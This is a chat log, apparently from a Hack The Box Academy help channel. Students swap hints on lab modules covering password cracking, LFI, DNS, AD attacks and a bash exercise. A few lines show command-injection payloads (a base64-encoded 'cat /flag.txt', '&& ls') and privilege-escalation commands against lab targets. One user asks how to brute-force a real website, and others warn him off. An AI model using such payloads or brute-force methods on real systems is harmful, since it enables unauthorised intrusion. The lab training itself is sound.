Not based off the random arbitrary rules they give you in that section

flat minnow
#

I have done both of changing threads and mutating the password.list based on the custom.rule in the resources

fathom pendant
#

You should be able to add time to the lab as well

#

Each lab allows you to add time up to a total of 6 hours

flat minnow
#

hmm that I didn't know, thanks!

zinc marsh
#

someone who completed password attacks?

fathom pendant
#

Yes

acoustic owl
sleek urchin
#
zinc marsh
#

it takes hours to crack the password

autumn pilot
#

i'm pretty sure there are quite useful hints in this channel about that

acoustic owl
#

Yes, the attack here lasts a very long time.

brazen apex
#

Whats your guys preferred method of taking notes with obsidian

brazen apex
#

do you take notes on a service and the tools you would use to enum and exploit
or
Do you make a folder of tools backlink how you would use em

fathom pendant
#

Oh yeah no if you're trying ssh

#

You're not gonna get anywhere

cunning nimbus
#

I am trying to use go buster and when I enter the path for the common.txt file, It says that its not there, but I looked for it and it is there, so can someone pls explain what I am doing wrong

fathom pendant
#

Are you using the full /path/to/file?

cunning nimbus
#

yes

#

I am entering it like I see in the example

fathom pendant
#

Is it in the same location as example?

cunning nimbus
#

yes

sick mural
cunning nimbus
#

ok I dont know why it didnt work, but when I entered the path one word at a time and auto tabed, it found it

naive pelican
#

I can't seem to connect to the machine at the end of the active directory module, when I ping the machine it says Destination Host Unreachable and when I try with xfreerpd it says broken pipe. Other machines in other modules work fine. How can I solve this?

#

Spawning a web instance works and I can ping the machine, but I can't do it with my own machine through vpn

golden vortex
#

need help on sqlmap assessment. Found ******.php I can exploit it but i cannot retrieve database names

sleek urchin
#

I am doing Attacking Common Services: Attacking DNS but i get errors such as

#

dig AXFR @ns2.inlanefreight.htb inlanefreight.htb ;; Connection to 10.129.119.33#53(10.129.119.33) for inlanefreight.htb failed: timed out. ;; Connection to 10.129.119.33#53(10.129.119.33) for inlanefreight.htb failed: timed out. ;; Connection to 10.129.119.33#53(10.129.119.33) for inlanefreight.htb failed: timed out.

#

same with ns{1,2,...}.inlanefreight.htb

acoustic owl
sleek urchin
#

and to be honest, i don't know the meaning of resolve in the context of DNS

acoustic owl
fathom pendant
#

What does a DNS do?

#

Is the question then :)

sleek urchin
golden vortex
#

need help on sqlmap assessment. Found **.php I can exploit it but i cannot retrieve database names with sqlmap

golden vortex
#

okay

sleek urchin
golden vortex
#

which section?

sleek urchin
#

are talking about ?

golden vortex
#

Im doing the sqlmap assessment

fathom pendant
#

Sqlmap essentials?

golden vortex
#

yeah sorry

sleek urchin
#

there is SQLMap Essentials & SQL Injection Fundamentals , which module ?

golden vortex
#

sqlmap essentials

sleek urchin
golden vortex
#

skills assessment

sleek urchin
#

Attack Tuning or Database Enumeration or what ?

#

ok

fathom pendant
#

The skill assessment portion

#

The last one

golden vortex
#

Ive found the ac***.php but i cant retrieve the database name

zinc marsh
#

the machine crash all time

#

trying to crack the password

fathom pendant
#

Are you trying to brute force the ssh?

rustic sage
#

@everyone

fathom pendant
#

Nice try

tidal mango
#

In the Attacking Common Applications module, LDAP section, I have tried everything I can think of plus more, with both the login form page, ldapsearch from terminal and with Burp repeater. Can someone help me out with figuring out how to do this LDAP injection? Thanks!

#

NVM... just got it....🤦‍♂️

broken warren
#

Why how come when i run hashcat once i get the standard verbose output, and correct string for hash. But when i clear screen and try the EXACT same command again it i get a different output and a message that says "INFO: All hashes found as potfile and/or empty entries! Use --show to display them." Its not a big deal i guess i can run the command with --show but i like the output. Rn im just closing the terminal and opening a new one everytime.

zinc marsh
fathom pendant
fathom pendant
# zinc marsh ftp

Interesting iirc you can do threads up to 48 and it perform just fine. But by the machine stops working/crashing you mean it just stops responding entirely, no scan or anything gives anything back?

manic magnet
#

Can someone help me with the Attacking Common Services Module - Hard Lab ? I am stuck on the last question. I got creds for fi*** but I don't know where to go now. Tried mssql but I don't seem to get into that. Can someone give me a hint or something?

leaden mortar
#

Hello, I'm currently trying to do the final Skills Assessment in the File Inclusion module but I'm stuck and I feel like I'm close to finishing.

I was able to get the source code which I've since reviewed. From the source code I made my way to ilf_admin/index.php. At this point, I can use LFI to open /etc/passwd. I'm looking for a flag somewhere in /. I've tried every RCE method taught in the module (except for those that require uploading a file, since I haven't found any upload options) but none have worked.

I tried fuzzing the web server to look for config files (HTTP headers tell me it's an nginx server running PHP 7.3) and I did find /etc/nginx/nginx.conf, though it showed me little. Except that it has a line 'include /etc/nginx/*.conf' but since I don't know what those conf files are, I can't get more info from there. I've tried a few different wordlists to fuzz for php.ini, but haven't found it either.

At this point, I have a suspicion that I need to achieve RCE somehow, and ls the root folder in order to expose the flag I'm looking for. I haven't had any luck getting RCE to work, and I'm looking for some pointers/hints/advice/etc thank you ❤️

quasi wave
#

hi I am working on the conditional execution for the BASH module. I'm getting this:

#!/bin/bash
#count the number of characters in a variable
#echo $variable | wc -c

#Variable to encode
$var="nef892na9s1p9asn2aJs71nIsm"

for counter in {1..40}
do
  $var=$(echo var | base64)
if [$counter -eq 35]
  then
    echo $var{counter:34:1}
 fi
done
#

but it still isn't working

#

can someone please give me a hint?

steady hawk
steady hawk
quasi wave
#

I corrected that but it says the value assigned to var was "not found" and that 1..40 is an "illegal number"

steady hawk
#

As for the counter is an illegal number try echo ${var:34:1}

quasi wave
#

so like this:

var="nef892na9s1p9asn2aJs71nIsm"

for counter in {1..40}
do
  $var = $(echo $var | base64)
  if [ $counter -eq 35 ]
    then
      echo $var{$var:34:1}
  fi
#

that's fewer errors but still not working. Its saying the value for var is "not found" and its still an illegal number

steady hawk
#

var=$(echo $var | base64)
echo ${var:34:1}

twin gulch
#

Hey guys. I’m at password attacks skill assessments hard lab. Trying with much effort to crack Johanna ‘s password with no success. Tried the original and mutated password file with crackmapexec. Am I on the lead? Maybe try again?

quasi wave
steady hawk
#

No, just replace those lines

quasi wave
#

then get rid of if-statement?

south glen
#

can anyone help me with the footprinting module's dns section last question

#

im not able to find the given ip address to look for

#

fqdn

quasi wave
#

hold on wait

#

is this closer?

var="nef892na9s1pasn2aJs71nIsm"

for counter in {1..40}
do
  if [ $counter -eq 35 ]
    then
      echo ${var:34:1}
  fi
done
#

only thing is illegal number is still there?

autumn pilot
#

that code won't work

quasi wave
#

ok so what am I doing wrong here?

#

thanks by the way

#

I really appreciate the help?

autumn pilot
#
echo ${var:34:1}```
The way you are calling the output of the variable will print the 35th character on the 35th sequence, e.g. counter
#

You need to count the number of characters of the generated variable in the 35th sequence

quasi wave
#

right ok

#

what about

echo ${var:0:1}
autumn pilot
#

Change the approach, you don't need to count only one character, but all the characters on sequence 35

quasi wave
#

so like this:

echo ${var::}
autumn pilot
#

I see what you want to do, but simplify it

#

Write it as you are writing it in a shell

quasi wave
#
echo $var
autumn pilot
#

Let's assume the variable var=hello, how would you print it out and count the words in it

quasi wave
#

echo $var | wc -c

#

something like that?

autumn pilot
#

😉

quasi wave
#

what about illegal number?

#

its saying {1..40} is illegal number

#

it sounds like that's the only thing left

autumn pilot
#

if you haven't edited much the initial code, then the addition that you have made to it won't break it

south glen
#

@autumn pilot can you help me with the footprinting module - dns section thank u for your time

autumn pilot
#

doesn't seem like I have notes for that section

acoustic owl
#

Host 203, right?

south glen
#

i not able to get this one only

#

i even ran the dnsenum

acoustic owl
#

Have you found all the zones? Remember that not all zones allow a zone transfer from everyone.

south glen
#

ohk

#

let me check one more time

acoustic owl
quasi wave
#

I don't get what I am doing wrong at this point anymore

#

the shebang is there at the beginning I just didn't want to retype it

#

and pwnbox doesn't allow for copying into local machine obviously

autumn pilot
#

there is a dedicated copy-paste box

quasi wave
#

ok

#

so ya that's my actual code

#

thanks I noticed the dedicated copy-paste box

#

lmao

#

hi why was my code deleted? the code still doesn't work

autumn pilot
#

it works, but the question is why it gives a different result in pwnbox/workstation

quasi wave
#

it says illegal number

twin gulch
#

Hey guys. I’m at password attacks skill assessments hard lab. Trying with much effort to crack Johanna ‘s password with no success. Tried the original and mutated password file with crackmapexec. Am I on the lead? Maybe try again?

quasi wave
#

i ran it on my local machine I'm still getting illegal number

#

what would you do at this point?

autumn pilot
#

try with double "["

quasi wave
#

still is giving me illegal number

#

lmao

autumn pilot
#

additionally you are missing the following line - var=$(echo $var | base64)

opaque marlin
#

noob question ihaving issues with reverse shell can some point me in the right direction

quasi wave
#

I added that code but illegal number is still there

#

sorry about pasting code force of habit

autumn pilot
#

Take a screenshot of the cmd output

stiff spoke
#

what is this codes

#

(for waht)

quasi wave
autumn pilot
#

have you tried with bash?

stiff spoke
#

dude he is apple

#

(nvm)

quasi wave
#

I mean if my code isn't working on my local machine or in pwnbox and your saying it works I don't get it

#

even with the corrections

autumn pilot
#

bash <file>.sh

#

or make it executable and ./<file>.sh

quasi wave
#

I got it ok

#

I got it it worked

#

thanks

#

flag submitted

stiff spoke
#

np

torpid zinc
#

Hey, could someone help me with AD Enumeration & Attacks - Skills Assessment Part II?

half inlet
# opaque marlin

I think the issue is that in your reverse shell you put bin/sh instead of /bin/sh - there needs to be a slash (/) before the bin

opaque marlin
half inlet
#

Haha yeah it happens a lot

#

Just having another pair of eyes can help

opaque marlin
#

thanks

half inlet
#

Do you know of a way without using evolution and only command line? I am stuck on the same problem now - I’ve opened the email, I can see all the content but I see no flag

#

I got the flag now as well using evolution - I wonder why it doesn’t show in CLI

fathom pendant
#

Give me a minute and I'll send the website I found that had the commanda

#

1 fetch <num> body and 1 fetch <num> body[] are two separate commands that yield different results :)

fathom pendant
naive pelican
fathom pendant
#

retired machines only refer to the main app.hackthebox.com it would be kinda silly if the modules that you pay for would be retired wouldn't it?

naive pelican
#

Could it be that rdp uses udp or tcp and the vpn only supports tcp maybe

#

idk

fathom pendant
#

VPN can use either

#

It's not exclusive

#

Though it can be a tad of a pain, you can try swapping your config for the other one

#

Sometimes that does help

naive pelican
#

Ok I'll try that

twin gulch
#

Anyone who can help me at password attacks skill assessments hard lab??

half inlet
#

But yeah I saw atmail when I looked it up but i was on my school@network so ofc they block the educational material 😭

high current
#

how do i run a password generator on a website

#

i have the code

manic magnet
#

wdym ?

high current
#

but i wanna attach it to the website

high current
#

until true

manic magnet
#

you can use hydra for that I guess

high current
#

how do u guys get kali linux

#

is it on hack the box?

manic magnet
#

Hack the Box has a pwnbox instance which runs Parrot OS

#

its similar to Kali

high current
#

is it free?

manic magnet
high current
#

and can it run hydra?

manic magnet
#

via command line.

#

But as it seems you don't know a lot about such tools. So be careful and do not just use it on random sites because that would probably be against the law

dim hound
#

Personally I would recommend it, only when you PC / Laptop had the capability to support virtualization

high current
#

i cant boot linux from a usb

#

and its laggy

#

i jus wanna use parrot os on windows

manic magnet
dim hound
#

I don’t know your PC specs… but if you want to make it into cyber security, investing in your pc isn’t a mad investment if you ask me 🙂 but that’s all personally

manic magnet
high current
#

takes too long tbh

manic magnet
dim hound
#

Virtual box is free 🙂 only 4 GN of RAM + storage needed Preferable SSD

high current
#

where do i run the hydra code?

manic magnet
#

Latest version of Kali Linux 2022.4 guide here: https://youtu.be/5lEO137pUsE
here's the latest version: https://youtu.be/GUyn8raW_JU
In this video, I will walk you through the installation of Kali Linux in VirtualBox on a Windows 10 PC. The version we'll be installing is Kali Linux 2022.1 . Kali Linux is an excellent tool for cyber and network s...

▶ Play video
dim hound
dim hound
manic magnet
high current
#

does password cracking take longer on parrot os

#

?

high current
dim hound
manic magnet
high current
#

ok i have a 4090

#

so im good

dim hound
#

Dangggggg

#

That’s very good

manic magnet
#

Bro flexing

dim hound
#

That I would use Hashcat😂

#

Not JTR

manic magnet
#

true

high current
#

i just got it 3 weeks ago

#

for my birthday

manic magnet
high current
fathom pendant
dim hound
#

I have a 3060🥲 but I don’t game so yea I don’t really care about a good GPU

manic magnet
dim hound
dim hound
#

Well I have 32 GB of ram.. (me flexing)😂

fathom pendant
#

1070 maybe 4 gig allocated

manic magnet
dim hound
#

Hahahaha 😂

high current
#

is
ophcrack good?

#

it runs on windows

fathom pendant
#

I've never used it

dim hound
#

Also yes, personally I don’t use it much.

fathom pendant
#

Generally hashcat is the standard or John the Ripper

dim hound
#

Hashcat is my way to go, it has so many features 🙂

fathom pendant
#

If hashcat is being feral I give it to the Ripper

manic magnet
fathom pendant
#

And he's a gentleman giving me the answer

manic magnet
high current
manic magnet
high current
#

yo how do i get the websites hash?

magic solstice
high current
fathom pendant
dim hound
dim hound
magic solstice
fathom pendant
#

Reminder this channel is for conversation and help with the modules

#

NOT general web hacking (which is illegal)

dim hound
#

#hacker-lounge to have not related conversations about the modules 🙂

fathom pendant
high current
manic magnet
high current
#

for educational purposes

#

im not actually hacking

dim hound
fathom pendant
#

Do you have permission to test the vulnerable site

high current
#

yes

manic magnet
high current
#

he needs help testing it

fathom pendant
#

Then he should get an actual professional/more experienced person to test it

dim hound
#

Hahahah, then start up Kali 😆 type : find / -name rockyou.txt 2>/dev/null

fathom pendant
#

Hell first step is the vulnerability assessment

#

Which is documenting vulnerable plugins/pages/etc.

magic solstice
manic magnet
manic magnet
fathom pendant
magic solstice
manic magnet
dim hound
#

Well, it will redirect the errors (the unwanted messages, in my opinion), like messages “permission denied”

#

@magic solstice

magic solstice
#

ahh, got it, thank you a lot

fathom pendant
#

It's highly recommended to use a virtual machine as well @high current

high current
#

i have a kali linux iso file

#

on my usb

#

how do i boot it

fathom pendant
#
high current
#

i already downloaded kali

#

its on my F drive

#

i wanna have a usb so i can just unplug it when im done using kali

manic magnet
#

Read the stuff that was send.

high current
#

k

#

imma go into my bios hold up

manic magnet
#

Also again this channel is intended to discuss academy modules not explaining people how to hack

fathom pendant
#

It's better off doing it in a vm

half inlet
fathom pendant
#

Instead of on your main system

#

Because if you fuck up and brick your system, you're fucked

#

And considering, respectfully, you're a noob

manic magnet
#

I wonder if we will ever see them again 😂

fathom pendant
#

Reduce the risks

high current
#

im done

#

the iso file didnt run

#

in bios

manic magnet
fathom pendant
#

Eh

#

I call it as I see it

manic magnet
#

fair enough

manic magnet
fathom pendant
#

Because that's open to unverified users

potent rock
#

Hello, could someone help me with the footprinting Lab - medium, please.

fathom pendant
potent rock
#

I found credentials of the user "alex", but I can't access RDP

fathom pendant
#

What services are available is it possible to leverage an evil service first

potent rock
#

the ports of the services are open: rpcbind, msrpc, netbios-ssn and mountd

fossil crescent
#

Can anyone DM me / I DM someone on Skills Assessment - Hard on ABUSING HTTP MISCONFIGURATIONS? At a loss... Putting together the techniques, have def found cache poisoning, but any parameter I send seems to be keyed, along with version enum certainly suggests something should be vulnerable via chaining (but as all parameters seem to be keyed)... Thx. Solved. Everything is there... just a matter of putting it together... if anyone's stuck, just will say pay VERY-CLOSE-ATTENTION...

wooden rapids
#

im currently doing the live engagement in shells and payloads and i connected to someone elses rdp session, is this normal and can it be avoided? and if this was you.. sorry! your doing well!

light fern
#

Any1 know why im getting a python error on recon-ng ? I believe python 3.6+ works -- I currently have 3.11

urban anvil
#

AD Enumeration & Attacks - Skills Assessment Part II i am stuck with the final 2 question. 'Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.'

steady hawk
smoky charm
#

Hi everyone.
I´m doing the Getting Started Module and currently on the Privilege Escalation page.
I´m trying to attack the target machine, but I'm unsure on how to proceed.
I have tried using the ./linpeas.sh command, but it doesn't work, so I tried using the sudo -l command, but this only prodices the following information

Matching Defaults entries for user1 on ng-78316-gettingstartedprivesc-7zy5k-6d86875678-brpl8:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User user1 may run the following commands on
ng-78316-gettingstartedprivesc-7zy5k-6d86875678-brpl8:
(user2 : user2) NOPASSWD: /bin/bash

which I think tells me the /bin/bash command may be run without password, but I don't know what to do with this info.

So I'm not sure what else to do

fathom pendant
#

Maybe there's a way to __s__witch __u__ser

smoky charm
#

Thanks for the tip!
I didn't think about using the command su to switch to another user other than the root user.
But it asks for a password.
I believe this is because I should look around to try to find a document or something with the password for user2 exposed.
I'll try to keep going with that plan to see if I stumble unto something

#

Thanks!

#

So, I tried looking around for something I could use, but I was unable to find any kind of file or something I could use or read that may contain a password. I tried using password1 again and password2 trying to get lucky, but no luck so far, so I´m unsure on what to do next

#

I don't expect anyone to give me the answer, but a clue would be a god send.
Thanks!

smoky charm
#

Ok, I managed to do it.
And learned a lot in the process. I didn't know that executing the command /bin/bash, started a new bash process, and by doing it with the command sudo -u user2 /bin/bash, I was starting a new bash process with the user user2.
And from there everything else was pretty easy.

rain inlet
#

-+

torpid zinc
#

hey, i try to solve Q1 in AD Enumeration & Attacks - Skills Assessment Part II but i have tried everything i can think of ( smb, rpc, ldap, asreproasting, mssql) and nothing works. Could someone give me a hint?

autumn pilot
#

Try something that you haven't done yet

#

It was showcased in the starting sections of the module

torpid zinc
#

ohh i am stupid, totally forgot about it. Thanks a lot!

dim hound
#

I am using: Password2, as the password

autumn pilot
#

copy the provided username

dim hound
#

Apparently, this works 😂 ```bash
┌──[🛡️ f0rk]
└──╼[🔥]/home/f0rk $ ssh 'david@inlanefreight.htb'@10.129.118.77 -p 2222

dim hound
kind holly
#

can any one tell me that what will be SID of user bob.smith ,i got this from powershell as SId - S-1-5-21-2614195641-1726409526-3792725429-1003 and but incorrect anser showing .

worthy wraith
#

Is there any problem with spawn machines?

dim hound
#

Not that I am aware off... I just spawned one

worthy wraith
#

yes but it goes down after 2 3 minutes

kind holly
bright hemlock
#

hi all - now doing session security skills assessment. i've added xss to the profile and i'm catching the response on my machine.

i'm also able to use the submit-solution API to redirect, but i can't get the admin to visit my public profile to trigger the xss and catch the response. any tips?

nevermind - as always a reset seems to have fixed it...feel free to dm if you get stuck..

kind holly
#

can anyone help me to solve this questions from window fundamentals -- What 3rd party security application is disabled at startup for the current user?

stray sun
#

Hello I’m having hard time in nmap enumeration firewall evasion. I’m trying to response the question of dns version. I already execute the following commands but I didn’t have luck. Nmap -sS -sV -Pn <target-ip> —source-port 53
Nmap -sS -Pn -n —script firewall-bypass <target-ip>
Nmap -sA -Pn -n —disable-arp-ping <target-ip>
And other similar, can you please help me with a hint. I always get the port is filtered

manic magnet
#

Did you try to use decoys and such ? @stray sun

rustic sage
#

Hi folks

manic magnet
rustic sage
#

@unique yarrow

#

@slow flame

#

I am stuck on getting access ||to ||mssql|| via ||rdp|| on attacking common services - hard. I have used all creds to login to mssqlsvc through sqlcmd and sql management studio (locally) and through impacket-mssqlclient (remotely) but nothing works. ||

I know ||impersonation and accessing linked databases is done through mssql as it was part of a module||, however I cannot even get inside the ||mssql database||. Any help?

manic magnet
#

dm me

#

just finished it yesterday

rustic sage
manic magnet
#

yes

rustic sage
#

Ok thanks I will

unique yarrow
lament tiger
#

hey guys

#

is hacking my own ig account illegal?

acoustic owl
stray sun
rustic sage
#

hii

warm mountain
#

Command Injection - Skills Assessment
Hi, there! Would someone please help me out here? I'm stuck on this challenge. Tried some payloads like:
/index.php?to=tmp&from=696212415.txt'&finish=1&move=1%26%26%20ls
and
/index.php?to=tmp&from=696212415.txt&&bash<<<$(base64${IFS}-d<<<Y2F0IC9mbGFnLnR4dA==)&

but it doesn't work.

obsidian kettle
#

I need help with the Brute forcing on section Service Authentication Brute forcing. I have tried to create my own Cupp word list but I keep getting [errno 13] permission denied for william.txt. so I tried different password list that are on the machine, but I just get passwords that do not work. when I put them in for the ssh portion of the first question. Does anyone know how to either get cupp option to work or which password list I am suppose to use to get the correct password for this question? Thank you

proud cloak
#

I need a little help at the File Upload Attack - Skills Assessment module when i cat the flag i can't read it

#

is it encrypted ?

valid sinew
autumn pilot
#

Use the port that was given upon spawn

quick cairn
#

Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer. Im struggling here. How do i search for the user bross ? AD- Attacking Domain Trusts - Child -> Parent Trusts - from Linux

valid sinew
fathom pendant
valid sinew
fathom pendant
#

You. Do. Not. Need. To. Nmap

#

Visit the IP:PORT in a browser

valid sinew
#

Ok i did that and saw it was a wordpress site

fathom pendant
#

Nmap also is not the ONLY tool

#

Whatweb would have gotten you some results

#

Curl

fathom pendant
valid sinew
fathom pendant
#

Each section of that module is its own bubble

#

If it's neither then it is a public facing IP usually combined with a port indicating it's a docker container

#

Aka public facing web

west canopy
#

Happy Friday hackers! Hope you all enjoy this new Blue team module 🙂

valid sinew
fathom pendant
#

I mean

#

You can already access it

#

Part of enumeration is looking around

#

What can you see

acoustic owl
rustic sage
#

Can I dm someone about using web proxies skills assesment? I am truly confused by the first assignment (solved the rest).

acoustic owl
rustic sage
#

Yeah done that

#

Except that I didn't get the flag using burp proxy

#

If I remember correctly I did something like this a few moons ago when doing pico ctf

velvet crest
#

Hey can someone point me in the right direction in the dns footprinting last question? Ive tried everything:(

cunning nimbus
#

I am trying to do a privilege escalation and when I try to do the wget http://ipadress: port number/LinEnum.sh, I am getting a GET /LinEnum.sh 404, can someone help me or point me in the right direction pls

velvet crest
#

Yea

acoustic owl
velvet crest
#

Can i dm you for a sec?

acoustic owl
#

sure

acoustic owl
cunning nimbus
#

yes it is

velvet crest
cunning nimbus
#

do I have to be in the directory of the .sh file?

acoustic owl
cunning nimbus
#

ya thats what I just realized

pine dagger
acoustic owl
rustic sage
#

Well hello everyone

acoustic owl
#

What question exactly?

rustic sage
#

I'm new to this server

#

I just want to learn hacking so yeah give me some advice

rustic sage
# acoustic owl What question exactly?

This one is driving me crazy:
The /lucky.php page has a button that appears to be disabled. Try to enable the button, and then click it to get the flag.
I used inspect elements like everyone else 😦

acoustic owl
#

Yes, how else are you going to solve it?

rustic sage
#

by sending a post request

#

that's the only logical way I think of

acoustic owl
#

the easiest way is to edit the code in the inspector and then click the button.

rustic sage
#

I am sure I have followed that step, used burp. Can I dm you?

obsidian kettle
#

working through service authentication brute forcing. got the password, and login to ssh how do I go to dir to get the flag?

acoustic owl
#

Which module?